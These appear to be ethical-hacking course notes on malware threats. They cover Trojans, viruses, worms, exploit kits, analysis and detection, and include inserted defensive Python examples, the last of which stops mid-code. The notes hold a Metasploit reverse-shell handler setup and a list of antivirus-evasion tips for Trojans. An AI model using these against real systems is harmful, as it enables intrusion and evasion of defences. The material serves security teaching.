Ethical Hacking v10 Module 6 – Malware Threats
Malware Threats
Goals
• Understand Malware/Malware Propagation Techniques
• Understand Trojan Types/How They Work
• Understand Virus Types/How They Work
• Understand Computer Worms
• Understand Process of Malware Analysis
• Understand Malware Detection Techniques
• Learn Malware Countermeasures
• Understand Malware Penetration Testing
Module 6.0 Malware Threats
• 6.1 Introduction to Malware
• 6.2 Trojan Concepts
• 6.3 Virus and Worm Concepts
• 6.4 Malware Reverse Engineering
• 6.5 Malware Detection
• 6.6 Countermeasures
• 6.7 Anti-malware Software
• 6.8 Penetration Testing
6.1 Introduction to Malware
Introduction to Malware
• Malicious software that damages or disables computer systems and gives some control to the malware creator, used for:
  • Theft
  • Fraud
• Examples:
  • Trojan Horse
  • Virus
  • Backdoor
  • Worm
  • Rootkit
  • Spyware, Ransomware, Botnet, Adware, Crypter
How Malware Gets into Systems
• Instant Messenger applications
• IRC (Internet Relay Chat)
• Removable devices
• Attachments
• Legitimate software packaged by a disgruntled employee
• Browser and email software bugs
• NetBIOS (file sharing)
• Fake programs
• Untrusted sites and freeware software
• Downloading files, games, and screensavers from Internet sites
Common Techniques Attackers Use to Distribute Malware on the Web
• Blackhat Search Engine Optimization (SEO)
  • Ranking malware pages highly in search results
• Malvertising
  • Embedding malware in ad networks that appear on hundreds of legitimate sites
• Compromised Legitimate Sites
  • Hosting embedded malware that spreads to visitors
• Social Engineered Click-jacking
  • Tricking users into clicking on innocent-looking pages
• Spearphishing Sites
  • Impersonating legitimate organizations in an attempt to steal login credentials
• Drive-by Downloads
  • Exploiting flaws in browser software to install malware when a user merely visits a webpage
6.2 Trojan Concepts
How Hackers Use Trojans
• Delete or replace the operating system’s critical files
• Generate DoS attacks
• Record screenshots, audio, and video of the target computer
• Use the target computer for spamming and blasting email messages
• Download spyware, adware, and malicious files
• Disable firewalls and antivirus software
• Create backdoors for remote access
• Infect the target computer as a proxy server for relay attacks
• Use the target computer as a botnet to generate DDoS attacks
• Steal information including passwords, security codes, and credit card information using keyloggers
Common Ports used by Trojans

TCP Port  Name of Trojan
21        Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash
23        Tiny Telnet Server
25        Antigen, Email Password Sender, HaebuCoceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy, Kuang2 0.17A-0.30
31        Hackers Paradise
80        Executor
456       Hackers Paradise
555       Ini-Killer, Phase Zero, Stealth Spy
666       Satanz Backdoor
1001      Silencer, WebEx
1011      Doly Trojan
1170      Psyber Stream Server, Voice
1234      Ultors Trojan
1243      SubSeven 1.0 – 1.8
1245      VooDoo Doll
1492      FTP99CMP
1600      Shivka-Burka
1807      SpySender
1981      Shockrave
1999      BackDoor 1.00-1.03
2001      Trojan Cow
2023      Ripper
2115      Bugs
2140      Deep Throat, The Invasor
2801      Phineas Phucker
3024      WinCrash
3129      Masters Paradise
3150      Deep Throat, The Invasor
3700      Portal of Doom
4092      WinCrash
4567      File Nail 1
4590      ICQTrojan
5000      Bubbel
5001      Sockets de Troie
5321      Firehotcker
5400      Blade Runner 0.80 Alpha, Blade Runner
5401      Blade Runner 0.80 Alpha, Blade Runner
5402      Blade Runner 0.80 Alpha, Blade Runner
5569      Robo-Hack
5742      WinCrash
6670      DeepThroat
6771      DeepThroat
6969      GateCrasher, Priority
7000      Remote Grab
7300      NetMonitor
7301      NetMonitor
7306      NetMonitor
7307      NetMonitor
7308      NetMonitor
7789      ICKiller
8787      Back Orifice 2000
9872      Portal of Doom
9873      Portal of Doom
9874      Portal of Doom
9875      Portal of Doom
9989      iNi-Killer
10067     Portal of Doom
10167     Portal of Doom
10607     Coma 1.0.9
11000     Senna Spy
11223     Progenic trojan
12223     Hack´99 KeyLogger
12345     GabanBus, NetBus
12346     GabanBus, NetBus
12361     Whack-a-mole
12362     Whack-a-mole
16969     Priority
20001     Millennium
20034     NetBus 2.0, Beta-NetBus 2.01
21544     GirlFriend 1.0, Beta-1.35
22222     Prosiak
23456     Evil FTP, Ugly FTP
26274     Delta
30100     NetSphere 1.27a
30101     NetSphere 1.27a
30102     NetSphere 1.27a
31337     Back Orifice
31338     Back Orifice, DeepBO
31339     NetSpy DK
31666     BOWhack
33333     Prosiak
34324     BigGluck, TN
40412     The Spy
40421     Masters Paradise
40422     Masters Paradise
40423     Masters Paradise
40426     Masters Paradise
47262     Delta
50505     Sockets de Troie
50766     Fore
53001     Remote Windows Shutdown
54321     SchoolBus .69-1.11
61466     Telecommando
65000     Devil

UDP Port  Name of Trojan
1349      Back Orifice DLL
31337     Back Orifice 1.20
31338     DeepBO
54321     Back Orifice 2000
6.3 Trojan Types
Types of Trojans
• VNC Trojan
• HTTP Trojan
• ICMP Trojan
• Data Hiding Trojan
• Destructive Trojan
• HTTPS Trojan
• Botnet Trojan
• Proxy Server Trojan
• Remote Access Trojan
• FTP Trojan
• Defacement Trojan
• E-banking Trojan
• Covert Channel Trojan
• Notification Trojan
• Mobile Trojan
• Command Shell Trojan
Command Shell Trojans
• A command shell Trojan gives remote control of the command shell on a target computer
• The Trojan server is installed on the target computer and opens a port for the attacker to connect to
• A client is installed on the attacker’s computer and is used to launch a command shell on the target computer
Defacement Trojans
• Resource editors allow the attacker to view, edit, extract, and replace strings, bitmaps, logos, and icons from any Windows program
• Allow viewing and editing of almost any aspect of a compiled Windows program, including menus, dialog boxes, icons, etc.
• Apply User-styled Custom Application (UCA) to deface Windows applications
Botnet Trojans
• Botnet Trojans infect a large number of target computers across a large geographic area to create a network of bots that are controlled through a command and control (C&C) center
• Botnets are used to launch attacks on targets including DoS, spamming, click fraud, and financial information theft
Botnet Trojans (cont’d)
• Tor-based Botnet Trojans – ChewBacca
  • The ChewBacca Trojan stole data on 49,000 payment cards from 45 retailers in 11 countries over a two-month span
• Botnet Trojans – Skynet and CyberGate
  • Skynet – a Tor-powered Trojan with DDoS, Bitcoin mining, and banking capabilities, spread through Usenet
  • CyberGate RAT – a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously being developed by an experienced team
  • CyberGate RAT was built as a tool for various possible applications, ranging from assisting users with routine maintenance tasks to remotely monitoring children, capturing regular user activities, and automatically maintaining a backup of typed data
Proxy Server Trojans
• A Trojan proxy is usually a standalone application that allows a remote attacker to use the target computer as a proxy to connect to the Internet
• The Proxy Server Trojan starts a hidden proxy server on the target computer
• Thousands of computers on the Internet are infected with proxy servers using this technique
W3bPrOxy Tr0j4nCr34t0r (Funny Name)
• W3bPrOxy Tr0j4nCr34t0r is a proxy server Trojan
• Supports multiple connections from many clients
• Reports IP addresses and ports by email to the Trojan owner
FTP Trojans
• FTP Trojans install an FTP server on the target computer that opens FTP ports
• An attacker can then connect to the target computer using the FTP port to download any files that exist on the target computer
VNC Trojans
• A VNC Trojan starts a VNC server daemon on the target system
• The attacker connects to the target using any VNC viewer
• VNC is considered a utility, which makes the VNC Trojan difficult to detect
• Hesperbot
  • Hesperbot is a banking Trojan which features common functionalities, including keystroke logging, creation of screenshots and video capture, and configuring remote proxies
  • Creates a hidden VNC server for the attacker to connect to the target remotely
  • VNC does not log the user off like RDP, therefore the attacker can connect to the target computer while a user is working
HTTP/HTTPS Trojans
• Bypass Firewall
  • HTTP Trojans can bypass any firewall and work in the reverse way of a straight HTTP tunnel
• Spawn a Child Program
  • Executed on the internal host and spawns a child at a scheduled time
• Access the Internet
  • The child program appears to be a user to the firewall and is allowed to access the Internet
HTTP Trojan – HTTP RAT
• Displays ads, records personal data/keystrokes
• Downloads unsolicited files, disables programs/system
• Floods Internet connection and distributes threats
• Tracks browsing history and activities and hijacks the browser
• Makes fraudulent claims about spyware detection and removal
SHTTPD Trojan – HTTPS (SSL)
• SHTTPD is a small HTTP server that can be embedded in any program
• Can be wrapped with a legitimate program
• When executed it will transform the target computer into an invisible web server
ICMP Tunneling
• Covert channels are methods an attacker uses to hide data inside a protocol so that the data goes undetected
• Relies on techniques called tunneling that allow one protocol to be carried over another protocol
• ICMP tunneling uses ICMP echo-request and echo-reply messages to carry a payload and silently access or control a target computer
• Icmpsend
  • Client computer – icmpsend <target IP Address>
  • ICMP server – icmpserv -install
ICMP Tunneling Example
Remote Access Trojans
• Work like remote desktop access
• The attacker gains complete graphical user interface (GUI) access to the target computer remotely
• Install
  • Infect the target computer with server.exe
  • Plant a reverse-connecting Trojan
  • The Trojan connects to port 80 to establish the reverse connection
  • The attacker has complete control over the target computer
Remote Access Trojans (cont'd)
• Optix Pro
• MoSucker
• BlackHole RAT
• SSH-R.A.T.
• njRAT
• Xtreme RAT
• DarkComet RAT
• Pandora RAT
• HellSpy RAT
• ProRAT
• Theef
Remote Access Tools – Atelier Web Remote Commander
• Allows establishment of a connection to a remote computer
• Doesn’t install any client or supporting software on the remote computer
Hell Raiser RAT
• HellRaiser allows an attacker to gain access to the target computer
• Send pictures, pop up chat messages, and transfer files to and from the target system
• Completely monitor the operations performed on the target computer
Covert Channel Trojan – CCTT
• The Covert Channel Tunneling Tool (CCTT) Trojan is equipped with a number of exploitation techniques for creating arbitrary data transfer channels in the data streams authorized by a network access control system
• Enables attackers to get an external server shell from within the internal network, and from internal to external as well
• Sets up a TCP/UDP/HTTP CONNECT|POST channel permitting TCP data streams (SSH, SMTP, POP, etc.) between an external server and a device that resides on the internal network
E-banking Trojans
• Intercept a target’s banking account information before it is encrypted
• Send it to the attacker’s Trojan command and control center
• Steal the target’s data including credit card information
• Transmit it to remote hackers using email, FTP, IRC, and other methods
Types of E-banking Trojans
• TAN Grabber
  • The Trojan intercepts a valid Transaction Authentication Number (TAN) entered by the user
  • Replaces the TAN with a random number that will be rejected by the bank
  • The attacker can use the intercepted TAN with the user’s login details
• HTML Injection
  • The Trojan creates fake form fields on e-banking pages
  • The fields elicit extra information (card number, date of birth, etc.)
  • The attacker can use this information to impersonate the target and compromise the target’s account
• Form Grabber
  • The Trojan analyses POST requests and responses to the target’s browser
  • Compromises the scramble pad authentication
  • Intercepts scramble pad input as the user enters the Customer Number and Personal Access Code
E-banking Trojans – ZeuS and SpyEye
• The main purpose of ZeuS and SpyEye is to steal bank and credit card account information, FTP data, and other sensitive information from infected computers using web browsers and protected storage
• SpyEye can automatically and quickly initiate online transactions
• Additional e-banking Trojans include Citadel Builder and Ice IX
Destructive Trojans – M4sT3r Trojan
• M4sT3r is a very dangerous and destructive Trojan
• When executed it destroys the operating system
• Formats all local and network drives
• The user will no longer be able to boot the computer
Notification Trojans
• Notification Trojans send the location of the target’s IP address to the attacker
• Whenever the target computer connects to the Internet, the attacker receives a notification
Data Hiding Trojans (Encrypted Trojans)
• Encryption Trojans encrypt data files on the target’s system and render information unusable
• Written in C++
• Attackers demand a ransom or force the target(s) to make purchases from their online drug stores to unlock files
• Targets include:
  • Company databases
  • Personal information
  • Vital files and folders
  • Financial information
  • Confidential documents and information
6.4 Trojan Tools
How to Infect Systems Using a Trojan
• Create a new Trojan packet using a Trojan Horse Construction Kit
• Create a dropper, which is the part of a trojanized packet that installs the malicious code on the target computer
• Create a wrapper using wrapper tools to install the Trojan on the target computer
• Propagate the Trojan
• Execute the dropper
• Execute the damaging program/routine
• Major Trojan Attack Paths
  • User clicks on the malicious link
  • User opens malicious email attachments
Wrappers
• A wrapper binds a Trojan executable with an .exe application that appears to be a game or office application
• The two programs are wrapped together into a single file
• When the user runs the wrapped .exe:
  • It installs the Trojan in the background
  • Then runs the wrapping application in the foreground
Dark Horse Trojan Virus Maker
Crypters
• Software used by hackers to hide viruses, keyloggers, or tools of any kind to avoid detection by antiviruses
• Can encrypt, obfuscate, and manipulate malware
• Makes it harder to detect by security programs
• Used by cybercriminals to create malware that can bypass security programs
• Presents itself as a harmless program until it gets installed
Types of Crypters
• Static/statistical crypters
  • Use different stubs to make each encrypted file unique
  • Having a separate stub for each client makes it easier for malicious actors to modify or, in hacking terms, “clean” a stub once it has been detected by security software
• Polymorphic crypters
  • Considered more advanced
  • Use state-of-the-art algorithms that utilize random variables, data, keys, decoders, and so on
  • One input source file never produces an output file that is identical to the output of another source file
• Crypter services are available online for a reasonable fee ($10 - 100)
Crypter Examples
• Msfvenom
• AIO FUD Crypter
• Hidden Sight Crypter
• Galaxy Cryptor
• Criogenic Crypter
• Heaven Crypter
• SwayzCryptor
• Aegis Crypter
Creating a Malicious Payload Using MSFVENOM
Exploit Kit
• An exploit kit or crimeware toolkit is a platform to deliver exploits and payloads
• Delivers Trojans, spyware, backdoors, bots, buffer overflow scripts, etc. onto the target
Creating a Malicious Payload in Metasploit
Set Up Your Exploit Multi Handler

  use exploit/multi/handler
  set PAYLOAD windows/x64/meterpreter/reverse_tcp
  set LHOST <kali IP>
  set LPORT 4444
  show options
  run
Infinity
• The Infinity Exploit Kit is an exploit kit that uses vulnerabilities in Mozilla Firefox, Internet Explorer, and Opera to install threats on the target computers
• Malware analysts have also reported that the Infinity Exploit Kit exploits known vulnerabilities in web browser add-ons and platforms like Java and Adobe Flash to carry out its attacks
• The Infinity Exploit Kit is used to compromise the target computers and may be associated with other threats
• The Infinity Exploit Kit will find and use any vulnerability to install threats on the PC
Other Exploit Kits
• Phoenix Exploit Kit
  • The Phoenix Exploit Kit is a commercial crimeware tool that until fairly recently was sold by its maker in the underground for a base price of $2,200
  • It is designed to booby-trap hacked and malicious websites so that they impose drive-by downloads on visitors
  • Phoenix targets only Microsoft Windows computers
• Blackhole Exploit Kit
  • BlackHole is commercial crimeware designed to be stitched into hacked or malicious sites and exploit a variety of web-browser vulnerabilities for the purpose of installing malware of the customer’s choosing
  • Once an extremely popular crimeware-as-a-service offering, Blackhole was for several years responsible for malware infections and stolen banking credentials, and likely contributed to tens of millions of dollars stolen from small to mid-sized businesses
Other Exploit Kits (cont'd)
• Bleeding Life
  • Exploit pack run on Java Juice
  • What’s interesting about this kit is that its authors advertise that one of the exploits included isn’t really an exploit at all: it’s a social engineering attack where the hacked page will simply abuse built-in Java functionality to ask the visitor to run a malicious Java applet
• Crimepack
  • A prepackaged bundle of commercial crimeware that attackers can use to booby-trap hacked websites with malicious software
  • Another Java exploit software
Evading AntiVirus Techniques
• Break the Trojan file into multiple pieces and zip them into a single file
• Always write the Trojan, and embed it in an application
• Change the Trojan’s syntax
• Convert .exe to a VB script
• Change the .exe extension to .doc.exe, .ppt.exe, .pdf.exe, as Windows hides file extensions by default
• Change the content of the Trojan using a hex editor and also change the checksum and encrypt the file
• Never use Trojans downloaded from the web, as antiviruses can detect these with no trouble
6.5 Virus and Worm Concepts
Introduction to Viruses
• A virus is a self-replicating program that produces its own copy by attaching itself to another program, computer boot sector, or document
• Viruses are usually transmitted through file downloads, infected removable disk drives, flash drives, and email attachments
• Virus characteristics
  • Infects other programs
  • Alters data
  • Transforms itself
  • Corrupts files and programs
  • Encrypts itself
  • Self-replicates
The Life of a Virus
• Design – a virus is developed using programming code or construction kits
• Replication – viruses replicate for an amount of time and then spread
• Launch – the virus is activated by the user
• Detection – the virus is then detected by antivirus software
• Incorporation – antivirus software continuously updates its software to automatically eradicate the virus
• Elimination – the threat of that virus is eliminated when users keep their antivirus software up to date
Working of Viruses
• Infection Phase
  • The virus replicates itself and attaches to an .exe file in the system
• Attack Phase
  • Viruses are programmed with trigger events to activate and corrupt systems
  • Viruses may infect each time they are run
  • Viruses may run only when predefined conditions occur
  • Viruses may run on specific days, dates, times, or events
Reasoning Behind Creating Viruses
• Cause damage to an individual or organization
• Receive financial benefits
• Used for research projects
• Play a trick
• Cause vandalism
• Perpetrate cyber terrorism
• Distribute ideological messages (political, religious, etc.)
Indication of Virus Attack
• Abnormal Activities – the system acts in an unusual and unexpected way
  • Processes take more time to complete
  • Computer unresponsive
  • Drive labels change
  • Unable to boot operating system
  • Computer slows down when running normal applications
• False Positives – many glitches can result from viruses, but not all
  • Many antivirus alerts
  • Computer freezes periodically
  • Files and folders are missing
  • Hard drive accesses increase
  • Browser window freezes frequently
How Do Computers Become Infected
• Users download or run files from untrusted sources
• Users open infected email attachments
• Users install pirated and untrusted applications
• Users do not keep operating systems/applications updated regularly
• Users do not install new versions of plug-ins when directed
• Users do not keep antivirus applications up to date
6.6 Virus Types
Ransomware
• Ransomware is a type of malware that restricts access to a target computer’s files and folders and demands an online ransom payment to the malware creators
• Types
  • CryptorBit Ransomware
  • CryptoLocker Ransomware
  • CryptoDefense Ransomware
  • CryptoWall Ransomware
  • Police-themed Ransomware
Types of Viruses
• System or Boot Sector
• File
• Cluster
• Multipartite
• Macro
• Stealth/Tunneling
• Encryption
• Sparse Infector
• Add-on
• Polymorphic
• Companion/Camouflage
• Intrusive
• Metamorphic
• Shell
• Direct Action or Transient
• Overwriting File
• File Extension
• Terminate and Stay Resident (TSR)
System or Boot Sector Viruses
• A boot sector virus moves the MBR to another location on the hard disk and copies itself to the original location of the MBR
• When the affected system boots, the virus code is executed first and then control is passed to the original MBR
File and Multipartite Viruses
• File Viruses
  • Infect files which are executed or interpreted in the system, including .exe, .sys, .com, .prg, .bat, .mnu, .obj, etc.
  • Can be either direct-action (non-resident) or memory-resident
• Multipartite Viruses
  • Infect the system boot sector and executable files at the same time
Macro Viruses
• Infect files created by Microsoft Word or Excel
• Most are written using Visual Basic for Applications (VBA)
• Infect templates or convert infected documents into template files, while appearing normal
Cluster Viruses
• Modify directory table entries so that they point users or system processes to the virus code rather than the actual application
• Only one copy of the virus is stored on disk, but it infects all applications on the computer
• Will launch itself first when any application on the computer is started, after which control is passed to the actual application
Stealth/Tunneling Viruses
• Evade antivirus software by intercepting its requests to the operating system
• Hide by intercepting the antivirus software’s request to read the file and passing the request to the virus instead of the operating system
• The virus then returns an uninfected version of the file to the antivirus software, which makes it appear clean
Encryption Viruses
• Use simple encryption to encipher the code
• Are encrypted with a different key for each infected file
• The antivirus cannot directly detect them using signature detection methods
Polymorphic Code
• Mutates while keeping the original algorithm intact
• To enable this, the virus must have a polymorphic engine (mutating engine)
• When well-written, no parts remain the same on each infection
Metamorphic Viruses
• Rewrite themselves completely every time they infect a new executable
• Metamorphic code can reprogram itself by translating its own code into a temporary representation and then back to normal code
File Overwriting or Cavity Viruses
• A cavity virus overwrites a part of the host file that is constant, usually with nulls, without increasing the length of the file and while preserving functionality
Sparse Infector Viruses
• Infect only occasionally, not every application that is executed
• Infect only files that are a certain size
• This helps the virus avoid detection
Companion/Camouflage Viruses
• A computer virus that stores itself in a file that is named similarly to another program file that is commonly executed
• When that file is executed, the virus will infect the computer or perform malicious steps such as deleting the files on the user’s computer hard drive
Shell Viruses
• Infect a computer by wrapping themselves around code which already exists, such as the operating system code which writes to a file
• Whenever a program tries to use the enclosed code, the virus code is executed
File Extension Viruses
• Change the extensions of files
• .txt is safe as it indicates a pure text file
• With file extensions hidden, a file may appear to be safe, but will not be
• Example: File.txt could really be File.txt.vbs
• Turn off “hide file extensions” in the operating system
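The File.txt.vbs trick works only because the operating system hides the final extension; the check a defender can automate is to look at the full name. The Python below is an added example, not course material: it flags names whose last extension is executable while the one before it is a document or image type, names padded with spaces so the real extension scrolls out of view, and names containing a Unicode right-to-left override, which makes a name display with its extensions reversed. The extension sets and the filenames it scans are constructed assumptions to extend for your own environment.

```python
"""Flag filenames built to look harmless when extensions are hidden.

Added example; not course material. The filenames scanned are constructed.
"""
import re
from typing import Dict, List

# Extensions Windows will execute or interpret (assumption; extend as needed).
EXECUTABLE_EXTS = {
    "exe", "scr", "com", "pif", "bat", "cmd", "vbs", "vbe", "js", "jse",
    "wsf", "wsh", "ps1", "hta", "msi", "lnk",
}
# Extensions a user reads as "just a document or a picture" (assumption).
DECOY_EXTS = {"txt", "doc", "docx", "pdf", "xls", "xlsx", "ppt", "pptx",
              "jpg", "jpeg", "png", "gif", "rtf", "csv", "zip"}
# Unicode bidirectional controls; U+202E makes the rest of a name display reversed.
BIDI_CONTROLS = ("\u202e", "\u202d", "\u2066", "\u2067", "\u2068")
# Three or more spaces immediately before the final extension.
PADDED_EXT = re.compile(r"\s{3,}\.[A-Za-z0-9]+$")

# Constructed names: the first four should be flagged, the last two should not.
SAMPLE_NAMES = [
    "File.txt.vbs",
    "Invoice-2023.pdf.exe",
    "holiday.jpg                         .scr",
    "report\u202efdp.exe",          # renders as "reportexe.pdf"
    "notes.txt",
    "backup.tar.gz",
]


def extensions(name: str) -> List[str]:
    """All dot-separated suffixes, lower-cased and stripped: 'A.Txt.VBS' -> ['txt', 'vbs']."""
    parts = name.lower().split(".")
    return [p.strip() for p in parts[1:]]


def assess_filename(name: str) -> List[str]:
    """Reasons the name is deceptive; an empty list means it passed."""
    reasons = []
    if any(ch in name for ch in BIDI_CONTROLS):
        reasons.append("bidirectional override character in name")
    exts = extensions(name)
    if exts and exts[-1] in EXECUTABLE_EXTS:
        if len(exts) >= 2 and exts[-2] in DECOY_EXTS:
            reasons.append(f"document-looking .{exts[-2]} hides executable .{exts[-1]}")
        if PADDED_EXT.search(name):
            reasons.append("spaces pad the name so the real extension scrolls out of view")
    return reasons


def scan(names: List[str]) -> Dict[str, List[str]]:
    """Only the names that raised at least one reason."""
    flagged = {}
    for name in names:
        reasons = assess_filename(name)
        if reasons:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in scan(SAMPLE_NAMES).items():
        print(repr(name))
        for reason in reasons:
            print("   -", reason)
```

A plain executable such as setup.exe is deliberately not flagged: the check targets deception, not executables as such, which belong to the antivirus and application-control layers.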
Add-on and Intrusive Viruses
• Add-on viruses
  • Append their code to the host code without making any changes to the host code
  • Insert code at the beginning of the valid code
• Intrusive viruses
  • Overwrite the host code partly or completely with the viral code
Transient and Terminate and Stay Resident Viruses
• Transient
  • Disappears after running
• TSR
  • Loads itself into memory and stays there
Virus Hoaxes and Fake Antiviruses
• Virus Hoaxes
  • Hoaxes are false alarms claiming reports about a non-existent virus, and may contain virus attachments
  • Fake warning messages propagate to users telling them not to open a specific email that will damage their system
• Fake Antiviruses
  • Attackers disguise malware as an antivirus and trick users into installing it on their systems
  • Fake antiviruses damage target systems and can be considered malware
Computer Worms
• Malicious programs that operate across network connections without the need for human involvement
• Most worms replicate and spread across the network to consume resources
• Some worms carry a damaging payload
• Worm payloads are often used to install backdoors, turning infected computers into zombies and creating botnets
Differences between Virus and Worm
• Worms self-replicate, viruses don’t
• Worms cannot attach themselves to other programs
• Worms use file/information transport features to spread through infected networks automatically, viruses don’t
• Type of worm – Ghost Eye Worm
• Worm Maker – Internet Worm Maker Thing
6.7 Malware Analysis
Sheep Dip Computer
• Sheep dipping is an analysis of incoming messages/files for malware
• Sheep dip computers have port, file, and network monitors and anti-virus software
• Sheep dip computers have a strictly controlled connection to the network
Antivirus Sensor System
• Computer software that identifies/analyzes malicious code threats
• Used in conjunction with sheep dip computers
Malware Analysis
• Prepare the test bed by:
  • Isolating the system
  • Disabling shared folders/guest isolation
  • Copying the malware to the guest O/S
1. Perform static analysis while the malware is inactive
2. Collect information concerning:
  • String values found in the binary
  • Packaging/compression technique
3. Set up the network connection and ensure there are no errors
4. Run the virus and monitor process actions/system information
5. Record network traffic information
6. Determine which files have been added, which processes have been spawned, and which registry changes have been made
7. Collect information on service requests, DNS information, and incoming/outgoing connection attempts
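Steps 1 and 2 of the procedure above (string values in the binary, packaging/compression technique) are the part that can be automated safely on the isolated analysis host before the sample is ever run. The Python below is an added example and not a course tool: it pulls printable strings out of a constructed stand-in for a binary, matches them against a short list of common packer section names (UPX, ASPack, MPRESS, Petite; an assumption, not an exhaustive list), picks out URL-like strings as candidate indicators, and measures entropy per 256-byte chunk, since a packed or encrypted section reads as near-random bytes. The 7.0 bits/byte cut-off is an assumption; on real files, compare against known-clean samples of the same file type.

```python
"""First-pass static triage: strings, packer markers, and chunk entropy.

Added example; not course material. SAMPLE_BINARY is a constructed blob
standing in for a suspicious executable, not a real malware sample.
"""
import math
import re
from collections import Counter
from typing import Dict, List

# Section names commonly left behind by packers (assumption; not exhaustive).
PACKER_MARKERS = {
    "UPX": ("UPX0", "UPX1", "UPX!"),
    "ASPack": (".aspack", ".adata"),
    "MPRESS": ("MPRESS1", "MPRESS2"),
    "Petite": (".petite",),
}
CHUNK_SIZE = 256
PACKED_ENTROPY = 7.0        # bits/byte; near-random data approaches 8.0

# Constructed stand-in for a binary: a header region with readable strings,
# padded to one chunk, followed by four chunks of near-random bytes.
_HEADER = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"UPX0\x00\x00\x00\x00" + b"UPX1\x00\x00\x00\x00"
    + b"GetProcAddress\x00LoadLibraryA\x00"
    + b"http://c2.example.invalid/gate.php\x00"   # placeholder, not a real host
)
_HEADER += b"\x00" * (CHUNK_SIZE - len(_HEADER))
# A permutation of 0..255 (167 is coprime to 256): maximal entropy and no
# printable run long enough to be mistaken for a string.
_PACKED = bytes((i * 167) % 256 for i in range(256)) * 4
SAMPLE_BINARY = _HEADER + _PACKED


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Like the `strings` utility: runs of printable ASCII of min_len or more."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.decode("ascii") for m in pattern.findall(data)]


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def chunk_entropies(data: bytes, size: int = CHUNK_SIZE) -> List[float]:
    return [shannon_entropy(data[i:i + size]) for i in range(0, len(data), size)]


def packer_hints(strings: List[str]) -> List[str]:
    """Names of packers whose marker strings appear anywhere in the binary."""
    return sorted(name for name, markers in PACKER_MARKERS.items()
                  if any(marker in s for s in strings for marker in markers))


def url_indicators(strings: List[str]) -> List[str]:
    return [s for s in strings if s.startswith(("http://", "https://"))]


def triage(data: bytes) -> Dict:
    """Static-analysis summary an analyst would record before running anything."""
    strings = extract_strings(data)
    entropies = chunk_entropies(data)
    peak = max(entropies)
    return {
        "strings": strings,
        "packer_hints": packer_hints(strings),
        "iocs": url_indicators(strings),
        "chunk_entropies": [round(e, 2) for e in entropies],
        "max_chunk_entropy": peak,
        "likely_packed": peak >= PACKED_ENTROPY,
    }


if __name__ == "__main__":
    report = triage(SAMPLE_BINARY)
    for key, value in report.items():
        print(f"{key}: {value}")
```

When a sample is flagged as packed, the strings list is expected to be short and uninformative; the meaningful strings only appear after unpacking, which is why step 2 records the packaging technique alongside the strings.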
Online Malware Analysis Services
• Anubis: Analyzing Unknown Binaries
• Avast! Online Scanner
• Malware Protection Center
• ThreatExpert
• Dr. Web Online Scanners
• Metascan Online
• Bitdefender QuickScan
• UploadMalware.com
• Online Malware Scanner
• ThreatAnalyzer
• VirusTotal
Various Analysis Services
• Trojan Analysis – NeverQuest
• Virus Analysis – Ransom Cryptolocker
• Worm Analysis – Darlloz
6.8 Malware Reverse Engineering
Approaches to Reverse Engineering Malware
• Reverse engineer
  • Use a hex dumper to look for bit patterns
  • Use a disassembler to read executable instructions in text format
• Examine the malware’s exploitation techniques
  • If the malware obfuscates itself, focus reverse engineering on only the new parts
  • Look for mistakes in ransomware encryption implementation
  • Look for command & control activity
• Categorization and clustering
  • Do broad-stroke analysis on bulk samples rather than a deep dive into a single sample
Techniques
• Static analysis
  • Analyze binaries without actually running them
  • Look at file metadata, disassemble or decompile the executable
• Dynamic analysis
  • Run the executable in a sandboxed environment
• Automated analysis
  • Use automated tools
  • Be careful that they don’t miss anything!
• Manual analysis
  • Use if the malware contains anti-debugging routines or anti-analysis mechanisms
Malware Analysis Tools
• Knowledge of Assembly language
• Disassembler – IDA Pro
• Debugger – OllyDbg, WinDbg
• System Monitor – Process Monitor, RegShot, Process Explorer
• Network Monitor – TCPView, Wireshark
• Packer Identifier – PEiD
• Unpacking Tools – Qunpack, GUNPacker
• Binary Analysis Tools – PE Explorer, Malcode Analysts Pack
• Code Analysis Tools – LordPE, ImpRec
IDA Pro Example
6.9 Malware Detection
How to Detect Trojans
• Scan for suspicious open ports
• Scan for suspicious startup programs
• Scan for suspicious running processes
• Scan for suspicious files/folders
• Scan for suspicious network activities
• Scan for suspicious registry entries
• Scan for suspicious device drivers
• Scan for O/S files that have been suspiciously modified
• Scan for suspicious Windows services
• Run a Trojan scanner
Scanning for Suspicious Ports
• Trojans open ports that are otherwise unused and connect to Trojan handlers
• Watch for connections to unknown/suspicious IP addresses
Ports Monitoring Tools
• TCPView
• CurrPorts
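The port table under Common Ports used by Trojans and the Scanning for Suspicious Ports slide describe the same check: compare what is listening on, or connected out from, a host against the ports historically used by Trojans. The Python below is an added example, not a tool from the course and not TCPView or CurrPorts: it loads a subset of the module’s port table, parses netstat-style output (the sample lines are constructed), and flags sockets bound to a listed port or connected to one on a remote host. Hits on ports that are also everyday services (21, 23, 25, 80) are marked weak, because a port number alone is a lead for the process, service, and file checks that follow, not a finding.

```python
"""Correlate a host's sockets with the module's known-Trojan port list.

Added example; not course material. The netstat lines are constructed.
"""
from typing import Dict, List, Tuple

# Subset of the TCP/UDP table from the "Common Ports used by Trojans" slides.
TROJAN_PORTS: Dict[Tuple[str, int], str] = {
    ("TCP", 21): "Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash",
    ("TCP", 23): "Tiny Telnet Server",
    ("TCP", 80): "Executor",
    ("TCP", 1243): "SubSeven 1.0 - 1.8",
    ("TCP", 12345): "GabanBus, NetBus",
    ("TCP", 12346): "GabanBus, NetBus",
    ("TCP", 31337): "Back Orifice",
    ("TCP", 54321): "SchoolBus .69-1.11",
    ("UDP", 31337): "Back Orifice 1.20",
    ("UDP", 54321): "Back Orifice 2000",
}

# Listed ports that are also everyday services: a hit there is weak evidence.
COMMONLY_LEGITIMATE = {("TCP", 21), ("TCP", 23), ("TCP", 25), ("TCP", 80)}

# Constructed `netstat -ano` style output (Windows layout, PID in the last column).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
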